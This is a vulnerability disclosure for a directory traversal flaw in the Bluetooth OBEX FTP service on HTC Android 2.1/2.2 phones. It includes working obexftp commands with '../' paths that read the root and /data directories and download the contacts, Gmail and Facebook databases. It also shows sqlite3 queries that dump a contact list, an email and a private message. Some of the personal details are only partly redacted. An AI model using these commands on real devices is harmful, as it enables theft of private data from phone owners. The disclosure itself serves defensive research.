Title: HTC / Android OBEX FTP Service Directory Traversal |
Summary
HTC devices running Android 2.1 and Android 2.2 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and read arbitrary files, via a ../ in a pathname.
This vulnerability is related to CVE-2009-0244, a vulnerability discovered in 2009/01 affecting HTC devices running Windows Mobile 6 and Windows Mobile 6.1 and reported to HTC Europe through out 2009/02 - 2009/06. After the vulnerability was fully disclosed in 2009/07, HTC issued security hotfixes under the name Hotfix to enhance the security mechanism of Bluetooth service for all the affected products. HTC reproduced the same security flaw in Android phones shipped throughout 2010 and 2011.
Description
In the present HTC / Android phones are shipped with a Bluetooth stack, which provides Bluetooth communications with other remote devices. The File Transfer Profile (OBEX FTP) is one among all the Bluetooth services that may be implemented in the stack.
The following example is the output of a command for finding near devices supporting the File Transfer Profile (FTP) with sdptool, a tool available in Linux from kernel versions 2.4.6. Given the known profile name FTP, the command searches for Bluetooth devices nearby and inquires whether the File Transfer Profile (FTP) is supported.
|
gospel@ubuntu:~$ sdptool search FTP Inquiring ... Searching for FTP on 90:21:55:8C:2C:3A ... Service Name: OBEX File Transfer Service RecHandle: 0x10006 Service Class ID List: "OBEX File Transfer" (0x1106) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 4 "OBEX" (0x0008) Profile Descriptor List: "OBEX File Transfer" (0x1106) Version: 0x0100 |
The OBEX FTP Service
The OBEX FTP service is a software implementation of the File Transfer Profile (FTP). The File Transfer Profile (FTP) is intended for data exchange and it is based on the OBEX communications client-server protocol. The service is present in a large number of Bluetooth mobile phones. This service can be used for sending files from the phone to other remote devices and also allows remote devices to browse shared folders and download files from the phone.
The OBEX FTP service installed in HTC / Android phones is accessible from a PC by using an OBEX FTP client, such as ObexFTP or gnomevfs-ls for Linux, for instance.
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of the mobile phone and no path or the default path /, the command retrieves the content of the default directory of the FTP server.
|
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l Browsing 90:21:55:8C:2C:3A ... Connecting..\done Tried to connect for 1583ms Receiving "(null)"...|<?xml version="1.0"?< <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"< <folder-listing version="1.0"< <folder name="LOST.DIR"/< <folder name=".footprints"/< <folder name="Music"/< <folder name="Photo"/< <file name="HTCDriver_2.0.7.17.exe" size="13702288" user-perm="R" created="20100519T195058Z"/< <folder name="albumthumbs"/< <folder name="dcim"/< <folder name="rssreader"/< </folder-listing<done Disconnecting../done |
In HTC / Android phones, the FTP Server can be activated only after the user inserted a SDCard in the device. Once activated, the service is configured in a way that only the files placed in the SDCard are shared. The default directory of the FTP Server in the file system is /sdcard. The user may select no other directory so sensitive files related to the operating system are not exposed.
The OBEX FTP Service Directory Traversal vulnerability
There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Android 2.1 and Android 2.2. As for the case of Windows Mobile (CVE-2009-0244), the OBEX FTP Server is a 3rd party driver developed by HTC and installed on HTC devices running Android operating system, so the vulnerability affects to this vendor specifically.
A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls over Linux to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../, the command retrieves the content of the parent of the default directory of the FTP server, this is the root directory of the disk file system.
|
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../" Browsing 90:21:55:8C:2C:3A ... Connecting..\done Tried to connect for 29ms Receiving "../"... Sending ".."...|done /<?xml version="1.0"?> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"> <folder-listing version="1.0"> <parent-folder/> <folder name="sqlite_stmt_journals"/> <folder name="config"/> <folder name="sdcard"/> <folder name="d"/> <folder name="etc"/> <folder name="cache"/> <folder name="system"/> <folder name="sys"/> <folder name="sbin"/> <folder name="proc"/> <file name="logo.rle" size="11336" user-perm="R" created="19700101T090000Z"/> <file name="init.rc" size="14664" user-perm="R" created="19700101T090000Z"/> <file name="init.goldfish.rc" size="1677" user-perm="R" created="19700101T090000Z"/> <file name="init.buzz.rc" size="3608" user-perm="R" created="19700101T090000Z"/> <file name="init" size="107668" user-perm="R" created="19700101T090000Z"/> <file name="default.prop" size="118" user-perm="R" created="19700101T090000Z"/> <folder name="data"/> <folder name="root"/> <folder name="dev"/> </folder-listing>done Disconnecting..-done |
Requirements to exploit the vulnerability
The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it, either by using the Legacy Pairing (Bluetooth 2.0) or Secure Simple Pairing (Bluetooth 2.1 and 3.0). However, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and MAC address spoofing, can be used in order to avoid this when using Legacy Pairing (Bluetooth 2.0). In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.
Devices must have Bluetooth enabled and FTP Server active when the attack is performed.
Scope of the attack
The Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system and download any file contained in any folder.
1) List arbitrary directories
Any directory within the file system of the phone can be browsed, beyond the limits of the default shared folder (the SDCard).
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the path ../data/, the command retrieves the content of the directory /data/ in the disk file system.
|
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -l "../data/" Browsing 90:21:55:8C:2C:3A ... Connecting..\done Tried to connect for 34ms Receiving "../data/"... Sending ".."...|Sending "data".../done -<?xml version="1.0"?> <!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd"> <folder-listing version="1.0"> <parent-folder/> <folder name="backup"/> <file name="pvcodec.txt" size="2" user-perm="R" created="20110202T122059Z"/> <folder name="system"/> <folder name="anr"/> <folder name="dalvik-cache"/> <folder name="drm"/> <folder name="property"/> <file name="rtsp_proxy" size="0" user-perm="R" created="19800106T092934Z"/> <folder name="app"/> <folder name="app-private"/> <folder name="data"/> <folder name="local"/> <folder name="misc"/> <file name="http_proxy" size="0" user-perm="R" created="19800106T092934Z"/> <folder name="dontpanic"/> <folder name="lost+found"/> </folder-listing>done Disconnecting..\done |
2) Read arbitrary files
Any file located in the file system can be downloaded. This may lead to access confidential data such as contacts, messages, emails or temporary internet files.
- Contacts database, located in /data/data/com.android.providers.contacts/databases/contacts2.db.
The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.android.providers.contacts/databases/contacts2.db, the command retrieves the contacts database.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.android.providers.contacts/databases/contacts2.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 50ms
Receiving "../data/data/com.android.providers.contacts/databases/contacts2.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.android.providers.contacts"...\Sending "databases"...|done
/done
Disconnecting..-done
The following example is the output of a SQL command for querying the contacts stored in the phone database, once downloaded from the device. Contacts are stored in plain text.
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.android.pcsc'"
08012341234
Philip J. Fry
pjfry@planex.com
08043214321
Bender Rodriguez
bender@planex.com
08098765432
Turanga Leela
leela@planex.com
08012345678
Hubert J. Farnsworth
farnsworth@planex.com
08014725836
Dr. Zoidberg
zoidberg@planex.com
08069696969
Zapp Brannigan
brannigan@doop.com
08088888888
Amy Wong
wong@planex.com
Also contacts synced from Google and Facebook accounts can be queried from the same database.
The following example is the output of a SQL command for querying the contacts synced from Google. Contacts are stored in plain text.
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.google'"
The following example is the output of a SQL command for querying the contacts synced from Facebook. Contacts are stored in plain text.
gospel@ubuntu:~$ ./sqlite3 contacts2.db "SELECT data.data1 from data INNER JOIN raw_contacts ON data.raw_contact_id = raw_contacts._id WHERE raw_contacts.account_type='com.htc.socialnetwork.facebook'"
*********
Aitana *******
Aitana *******
********@gmail.com
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/******_**********_*******_*.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/******_**********_*******_*.jpg
*********
Akemi ********
Akemi ********
********@i.softbank.jp
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs712.ash1/******_**********_*******_*.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs718.ash1/******_**********_*******_*.jpg
- Emails from Google account downloaded via GMAIL application, located in /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db
The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname /data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db, the command retrieves the email database.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 26ms
Receiving "../data/data/com.google.android.providers.gmail/databases/mailstore.*****@gmail.com.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.google.android.providers.gmail"...\Sending "databases"...|done
|done
Disconnecting../done
The following example is the output of a SQL command for querying an email stored in the email database, once downloaded from the device. Emails are stored in plain text.
gospel@ubuntu:~$ ./sqlite3 mailstore.*****@gmail.com.db "SELECT fromAddress, toAddresses, subject, body FROM messages WHERE _id=1"
""<******@his-world.co.jp>|"" <*****@gmail.com>|Information of ''Trip for You'' itinerary|This e-mail is delivered to you by online itinerary service, AXESS "Trip for You". You can check the itinerary anytime from the following URL.<br />
<br />
<a href="https://www.tripforyou.net/t4u/Auth.do?id=***************************************" target="_blank">https://www.tripforyou.net/<wbr />t4u/Auth.do?id=<wbr />=***************************************" <wbr /></a><br />
<br />
Hello.<br />
This is your E-ticket.<br />
Please check it and print yourself.<br />
- Friends, conversations, mailbox_messages, etc. from Facebook account downloaded via FACEBOOK application, located in ../data/data/com.facebook.katana/databases/fb.db
The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Android based mobile phone and the pathname ../data/data/com.facebook.katana/databases/fb.db, the command retrieves the Facebook database.
gospel@ubuntu:~$ obexftp -b 90:21:55:8C:2C:3A -g "../data/data/com.facebook.katana/databases/fb.db"
Browsing 90:21:55:8C:2C:3A ...
Connecting..\done
Tried to connect for 30ms
Receiving "../data/data/com.facebook.katana/databases/fb.db"... Sending ".."...|Sending "data".../Sending "data"...-Sending "com.facebook.katana"...\Sending "databases"...|done |done
Disconnecting../done
The following example is the output of a SQL command for querying information stored in the Facebook database, once downloaded from the device. Information is stored in plain text.
gospel@ubuntu:~$ ./sqlite3 fb.db ".tables"
albums friends page_search_results
android_metadata friends_data perf_sessions
cache key_value photos
chatconversations mailbox_messages search_results
chatmessages mailbox_messages_display stream_photos
connections mailbox_profiles user_statuses
default_page_images mailbox_threads user_values
events notifications
gospel@ubuntu:~$ ./sqlite3 fb.db "pragma table_info('mailbox_messages');"
0|_id|INTEGER|0||1
1|folder|INT|0||0
2|tid|INT|0||0
3|mid|INT|0||0
4|author_id|INT|0||0
5|sent|INT|0||0
6|body|TEXT|0||0
gospel@ubuntu:~$ ./sqlite3 fb.db "SELECT * FROM mailbox_messages WHERE _id=2"
2|0|10153235210237880|4|100000198131786|1991797311|so most likely , france 5 days. then bordoux (1 night) or maybe no, then madrid few days. then barcelona. then go back madrid then paris.